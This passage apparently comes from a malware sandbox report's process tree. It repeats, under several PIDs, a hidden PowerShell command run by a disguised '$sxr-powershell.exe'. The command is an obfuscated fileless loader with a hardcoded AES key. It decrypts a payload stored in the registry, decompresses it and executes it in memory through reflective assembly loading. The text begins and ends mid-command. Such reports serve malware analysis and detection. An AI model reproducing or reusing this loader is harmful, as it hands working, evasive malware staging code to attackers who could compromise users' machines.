[System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:2448
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:4996
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:2128
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = 